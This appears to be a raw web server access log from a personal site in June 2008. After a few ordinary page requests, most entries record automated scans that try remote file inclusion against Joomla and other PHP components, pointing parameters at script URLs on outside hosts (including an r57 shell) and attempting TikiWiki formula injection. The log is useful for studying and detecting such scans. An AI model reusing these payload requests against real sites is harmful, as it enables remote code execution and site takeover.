216.235.192.109 - - [17/Jun/2008:11:29:52 -0700] "GET /blog/wp-content/plugins/nggallery/css/nggallery.css HTTP/1.0" 200 5241 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" "dmulk.com"
216.235.192.109 - - [17/Jun/2008:11:29:53 -0700] "GET /blog/wp-content/plugins/nggallery/thickbox/thickbox.css HTTP/1.0" 200 4019 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" "dmulk.com"
216.235.192.109 - - [17/Jun/2008:11:29:53 -0700] "GET /blog/wp-includes/js/jquery/jquery.js?ver=1.2.3 HTTP/1.0" 200 29867 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" "dmulk.com"
216.235.192.109 - - [17/Jun/2008:11:29:54 -0700] "GET /blog/wp-content/plugins/nggallery/thickbox/thickbox-pack.js?ver=3.1.1 HTTP/1.0" 200 8888 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" "dmulk.com"
216.235.192.109 - - [17/Jun/2008:11:29:55 -0700] "GET /blog/wp-content/plugins/nggallery/admin/js/swfobject.js?ver=1.5 HTTP/1.0" 200 6722 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" "dmulk.com"
216.235.192.109 - - [17/Jun/2008:11:29:55 -0700] "GET /blog/wp-content/themes/default/images/kubrickbgcolor.jpg HTTP/1.0" 200 556 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" "dmulk.com"
216.235.192.109 - - [17/Jun/2008:11:29:55 -0700] "GET /blog/wp-content/themes/default/images/kubrickbgwide.jpg HTTP/1.0" 200 1014 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" "dmulk.com"
216.235.192.109 - - [17/Jun/2008:11:29:55 -0700] "GET /blog/wp-content/plugins/nggallery/imagerotator.swf HTTP/1.0" 200 42010 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" "dmulk.com"
216.235.192.109 - - [17/Jun/2008:11:29:55 -0700] "GET /blog/wp-content/plugins/nggallery/imagerotator.swf HTTP/1.0" 200 42010 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" "dmulk.com"
66.98.224.22 - - [17/Jun/2008:11:30:40 -0700] "GET //includes/kb_constants.php?module_root_path=http://www.geocities.com/anna.risma/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
66.98.224.22 - - [17/Jun/2008:11:30:40 -0700] "GET /logs//includes/kb_constants.php?module_root_path=http://www.geocities.com/anna.risma/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
74.6.8.97 - - [17/Jun/2008:11:30:41 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
217.75.193.70 - - [17/Jun/2008:11:30:55 -0700] "GET /logs/access_080127.log///////////////?components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://microenterprise.net/Project/includes/poiid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.75.193.70 - - [17/Jun/2008:11:30:57 -0700] "GET /logs///////////////?components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://microenterprise.net/Project/includes/poiid.txt???? HTTP/1.1" 200 52293 "-" "libwww-perl/5.79" "www.dmulk.com"
217.75.193.70 - - [17/Jun/2008:11:30:59 -0700] "GET ///////////////?components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://microenterprise.net/Project/includes/poiid.txt???? HTTP/1.1" 200 18585 "-" "libwww-perl/5.79" "www.dmulk.com"
67.195.51.115 - - [17/Jun/2008:11:31:00 -0700] "GET / HTTP/1.0" 200 18237 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
82.138.232.96 - - [17/Jun/2008:11:31:07 -0700] "GET /logs/access_080215.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://zeroboss.helloweb.eu/zip/idrox.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.138.232.96 - - [17/Jun/2008:11:31:08 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://zeroboss.helloweb.eu/zip/idrox.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.7.206.59 - - [17/Jun/2008:11:31:08 -0700] "GET /logs/access_080216.log/main.php?x=http://www.ilegais.xpg.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
82.138.232.96 - - [17/Jun/2008:11:31:08 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://zeroboss.helloweb.eu/zip/idrox.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.138.232.96 - - [17/Jun/2008:11:31:18 -0700] "GET /logs/access_080215.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://rjoos.ch/Reise/images/tOtti/help.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.138.232.96 - - [17/Jun/2008:11:31:19 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://rjoos.ch/Reise/images/tOtti/help.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.138.232.96 - - [17/Jun/2008:11:31:19 -0700] "GET /logs/access_080215.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://rjoos.ch/Reise/images/tOtti/help.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.138.232.96 - - [17/Jun/2008:11:31:19 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://rjoos.ch/Reise/images/tOtti/help.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.138.232.96 - - [17/Jun/2008:11:31:19 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://rjoos.ch/Reise/images/tOtti/help.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.138.232.96 - - [17/Jun/2008:11:31:19 -0700] "GET /logs/access_080215.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://zeroboss.helloweb.eu/zip/idrox.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.138.232.96 - - [17/Jun/2008:11:31:20 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://rjoos.ch/Reise/images/tOtti/help.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.138.232.96 - - [17/Jun/2008:11:31:20 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://zeroboss.helloweb.eu/zip/idrox.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.138.232.96 - - [17/Jun/2008:11:31:20 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://zeroboss.helloweb.eu/zip/idrox.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.75.193.70 - - [17/Jun/2008:11:31:55 -0700] "GET /logs/access_080118.log///////////////?components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://microenterprise.net/Project/includes/poiid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.195.54.54 - - [17/Jun/2008:11:32:05 -0700] "GET /?show=gallery&pageid=17 HTTP/1.0" 200 54281 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
67.195.51.180 - - [17/Jun/2008:11:32:17 -0700] "GET /?show=gallery&pageid=159 HTTP/1.0" 200 54281 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
200.29.147.48 - - [17/Jun/2008:11:32:21 -0700] "GET /logs/access_080117.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.hotelsunflower.it/includes/ons.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.29.147.48 - - [17/Jun/2008:11:32:24 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.hotelsunflower.it/includes/ons.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.29.147.48 - - [17/Jun/2008:11:32:25 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.hotelsunflower.it/includes/ons.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.221.143.111 - - [17/Jun/2008:11:32:43 -0700] "GET /logs//administrator/components/com_securityimages/lang.php?mosConfig_absolute_path=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.221.143.111 - - [17/Jun/2008:11:32:43 -0700] "GET //administrator/components/com_securityimages/lang.php?mosConfig_absolute_path=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
84.19.176.161 - - [17/Jun/2008:11:32:58 -0700] "GET /logs/access.log//main.php?pag=http://queb3.info/cruise/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.19.176.161 - - [17/Jun/2008:11:32:59 -0700] "GET //main.php?pag=http://queb3.info/cruise/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.19.176.161 - - [17/Jun/2008:11:32:59 -0700] "GET /logs//main.php?pag=http://queb3.info/cruise/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.67.20.173 - - [17/Jun/2008:11:33:24 -0700] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.immo-marrakech.com/files/contr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
80.67.20.173 - - [17/Jun/2008:11:33:25 -0700] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.immo-marrakech.com/files/contr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
67.195.58.157 - - [17/Jun/2008:11:33:46 -0700] "GET /logs/access_071212.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
66.7.206.59 - - [17/Jun/2008:11:33:49 -0700] "GET /logs/access_080215.log/index.php?x=http://www.ilegais.xpg.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.7.206.59 - - [17/Jun/2008:11:33:51 -0700] "GET /index.php?x=http://www.ilegais.xpg.com.br/id.txt??? HTTP/1.1" 200 18395 "-" "libwww-perl/5.810" "www.dmulk.com"
66.7.206.59 - - [17/Jun/2008:11:33:52 -0700] "GET /logs/index.php?x=http://www.ilegais.xpg.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
79.171.18.36 - - [17/Jun/2008:11:34:04 -0700] "GET /logs/access.log/errors.php?error=http://www.organicsalive.org/webyep-system/program/images/.bash/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
79.171.18.36 - - [17/Jun/2008:11:34:05 -0700] "GET /errors.php?error=http://www.organicsalive.org/webyep-system/program/images/.bash/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
79.171.18.36 - - [17/Jun/2008:11:34:06 -0700] "GET /logs/errors.php?error=http://www.organicsalive.org/webyep-system/program/images/.bash/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.67.20.173 - - [17/Jun/2008:11:34:17 -0700] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.immo-marrakech.com/files/contr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "dmulk.com"
80.67.20.173 - - [17/Jun/2008:11:34:17 -0700] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.immo-marrakech.com/files/contr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "dmulk.com"
79.171.18.36 - - [17/Jun/2008:11:34:18 -0700] "GET /logs/access_080201.log/errors.php?error=http://www.organicsalive.org/webyep-system/program/images/.bash/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.120.178 - - [17/Jun/2008:11:34:42 -0700] "GET /logs/access_080312.log//admin/index.php?o=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.19.120.178 - - [17/Jun/2008:11:34:43 -0700] "GET //admin/index.php?o=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.19.120.178 - - [17/Jun/2008:11:34:44 -0700] "GET /logs//admin/index.php?o=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
213.195.72.156 - - [17/Jun/2008:11:34:52 -0700] "GET /logs/access.log/errors.php?error=http://www.organicsalive.org/webyep-system/program/images/.bash/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.195.72.156 - - [17/Jun/2008:11:34:52 -0700] "GET /errors.php?error=http://www.organicsalive.org/webyep-system/program/images/.bash/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.195.72.156 - - [17/Jun/2008:11:34:52 -0700] "GET /logs/errors.php?error=http://www.organicsalive.org/webyep-system/program/images/.bash/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.246.21.243 - - [17/Jun/2008:11:34:55 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.nipservers.com/modules/Forums/admin/echo.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.246.21.243 - - [17/Jun/2008:11:34:56 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.nipservers.com/modules/Forums/admin/echo.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
75.125.162.210 - - [17/Jun/2008:11:35:10 -0700] "GET /logs/access_080429.log//embed/day.php?path=http://www.tangrei.com//admin/photos/uploads/thumbs/%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20/scnid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
75.125.162.210 - - [17/Jun/2008:11:35:10 -0700] "GET //embed/day.php?path=http://www.tangrei.com//admin/photos/uploads/thumbs/%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20/scnid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
75.125.162.210 - - [17/Jun/2008:11:35:11 -0700] "GET /logs//embed/day.php?path=http://www.tangrei.com//admin/photos/uploads/thumbs/%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20/scnid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.19.178.201 - - [17/Jun/2008:11:35:33 -0700] "GET /logs/dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.search.php?set_depth=http://www.team-nds.de/includes/rfi-response.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
84.19.178.201 - - [17/Jun/2008:11:35:33 -0700] "GET /dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.search.php?set_depth=http://www.team-nds.de/includes/rfi-response.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
87.253.213.4 - - [17/Jun/2008:11:36:05 -0700] "GET /logs/access_071219.log//components/com_simpleboard/image_upload.php?sbp=ftp://193.253.223.43/tmp/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.253.213.4 - - [17/Jun/2008:11:36:06 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=ftp://193.253.223.43/tmp/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.253.213.4 - - [17/Jun/2008:11:36:06 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=ftp://193.253.223.43/tmp/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.29.147.48 - - [17/Jun/2008:11:36:35 -0700] "GET /logs/access_071229.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.hotelsunflower.it/includes/ons.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.7.206.59 - - [17/Jun/2008:11:36:36 -0700] "GET /logs/access_080201.log/modules/My_eGallery/public/displayCategory.php?basepath=http://www.ilegais.xpg.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.7.206.59 - - [17/Jun/2008:11:36:36 -0700] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http://www.ilegais.xpg.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.7.206.59 - - [17/Jun/2008:11:36:37 -0700] "GET /logs/modules/My_eGallery/public/displayCategory.php?basepath=http://www.ilegais.xpg.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.15.129.23 - - [17/Jun/2008:11:36:37 -0700] "GET /logs/access_080507.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?error=http://www.naturopathic.org/images/bulletins/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
209.51.219.170 - - [17/Jun/2008:11:36:43 -0700] "GET /logs//ashnews.php?pathtoashnews=http://schirrwagen.info/license.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.51.219.170 - - [17/Jun/2008:11:36:43 -0700] "GET //ashnews.php?pathtoashnews=http://schirrwagen.info/license.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
201.16.242.3 - - [17/Jun/2008:11:36:58 -0700] "GET /logs/access_080127.log///////////////?components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://microenterprise.net/Project/includes/poiid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.16.242.3 - - [17/Jun/2008:11:36:59 -0700] "GET /logs///////////////?components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://microenterprise.net/Project/includes/poiid.txt???? HTTP/1.1" 200 52293 "-" "libwww-perl/5.805" "www.dmulk.com"
201.16.242.3 - - [17/Jun/2008:11:37:01 -0700] "GET ///////////////?components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://microenterprise.net/Project/includes/poiid.txt???? HTTP/1.1" 200 18585 "-" "libwww-perl/5.805" "www.dmulk.com"
66.7.206.59 - - [17/Jun/2008:11:37:03 -0700] "GET /logs/access_071212.log/modules/My_eGallery/public/displayCategory.php?basepath=http://www.ilegais.xpg.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.19.120.178 - - [17/Jun/2008:11:37:14 -0700] "GET /logs/access_080513.log//FormTools1_5_0/global/templates/admin_page_open.php?g_root_dir=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.19.120.178 - - [17/Jun/2008:11:37:15 -0700] "GET //FormTools1_5_0/global/templates/admin_page_open.php?g_root_dir=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.19.120.178 - - [17/Jun/2008:11:37:15 -0700] "GET /logs//FormTools1_5_0/global/templates/admin_page_open.php?g_root_dir=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
87.253.213.4 - - [17/Jun/2008:11:37:22 -0700] "GET /logs/access_080118.log//components/com_simpleboard/image_upload.php?sbp=ftp://193.253.223.43/tmp/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.221.143.111 - - [17/Jun/2008:11:37:27 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.221.143.111 - - [17/Jun/2008:11:37:27 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
84.19.176.161 - - [17/Jun/2008:11:37:32 -0700] "GET /logs/access_080103.log/index1.php?site=http://queb3.info/cruise/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.19.176.161 - - [17/Jun/2008:11:37:32 -0700] "GET /index1.php?site=http://queb3.info/cruise/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.19.176.161 - - [17/Jun/2008:11:37:33 -0700] "GET /logs/index1.php?site=http://queb3.info/cruise/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.161.12.202 - - [17/Jun/2008:11:37:39 -0700] "GET //login.php?dir=http://www.piterx.xpg.com.br/r57.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.205.96.205 - - [17/Jun/2008:11:37:40 -0700] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_phpshop&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.somosvialibre.org/.bash_tmp?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
67.205.96.205 - - [17/Jun/2008:11:37:40 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=com_phpshop&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.somosvialibre.org/.bash_tmp?? HTTP/1.1" 200 50 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
87.106.53.194 - - [17/Jun/2008:11:37:57 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=ftp://193.253.223.43/tmp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.53.194 - - [17/Jun/2008:11:37:57 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.53.194 - - [17/Jun/2008:11:37:58 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=ftp://193.253.223.43/tmp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.56.44.1 - - [17/Jun/2008:11:37:58 -0700] "GET /logs/access_080215.log/Scan%20tikiwiki/tiki-graph_formula.php?w=1&h=1&s=1&min=1&max=2&f[]=x.tan.phpinfo()&t=png&title=%20TikiWikihhttp://www.afk.altervista.org/forum/know/id.txt?http://www.afk.altervista.org/forum/know/id.txt HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
87.106.53.194 - - [17/Jun/2008:11:37:58 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.56.44.1 - - [17/Jun/2008:11:37:58 -0700] "GET /Scan%20tikiwiki/tiki-graph_formula.php?w=1&h=1&s=1&min=1&max=2&f[]=x.tan.phpinfo()&t=png&title=%20TikiWikihhttp://www.afk.altervista.org/forum/know/id.txt?http://www.afk.altervista.org/forum/know/id.txt HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
82.56.44.1 - - [17/Jun/2008:11:37:59 -0700] "GET /logs/Scan%20tikiwiki/tiki-graph_formula.php?w=1&h=1&s=1&min=1&max=2&f[]=x.tan.phpinfo()&t=png&title=%20TikiWikihhttp://www.afk.altervista.org/forum/know/id.txt?http://www.afk.altervista.org/forum/know/id.txt HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
82.56.44.1 - - [17/Jun/2008:11:37:59 -0700] "GET /logs/access_080215.log/Scan%20tikiwiki/tiki-graph_formula.php?w=1&h=1&s=1&min=1&max=2&f[]=x.tan.phpinfo()&t=png&title=%20TikiWikihhttp://www.afk.altervista.org/forum/know/id.txt?http://www.afk.altervista.org/forum/know/id.txt HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
82.56.44.1 - - [17/Jun/2008:11:37:59 -0700] "GET /logs/access_080215.log/Scan%20tikiwiki/tiki-graph_formula.php?w=1&h=1&s=1&min=1&max=2&f[]=x.tan.phpinfo()&t=png&title=%20TikiWikihhttp://www.afk.altervista.org/forum/know/id.txt?http://www.afk.altervista.org/forum/know/id.txt HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
82.56.44.1 - - [17/Jun/2008:11:38:00 -0700] "GET /Scan%20tikiwiki/tiki-graph_formula.php?w=1&h=1&s=1&min=1&max=2&f[]=x.tan.phpinfo()&t=png&title=%20TikiWikihhttp://www.afk.altervista.org/forum/know/id.txt?http://www.afk.altervista.org/forum/know/id.txt HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
82.56.44.1 - - [17/Jun/2008:11:38:00 -0700] "GET /Scan%20tikiwiki/tiki-graph_formula.php?w=1&h=1&s=1&min=1&max=2&f[]=x.tan.phpinfo()&t=png&title=%20TikiWikihhttp://www.afk.altervista.org/forum/know/id.txt?http://www.afk.altervista.org/forum/know/id.txt HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
82.56.44.1 - - [17/Jun/2008:11:38:00 -0700] "GET /logs/Scan%20tikiwiki/tiki-graph_formula.php?w=1&h=1&s=1&min=1&max=2&f[]=x.tan.phpinfo()&t=png&title=%20TikiWikihhttp://www.afk.altervista.org/forum/know/id.txt?http://www.afk.altervista.org/forum/know/id.txt HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
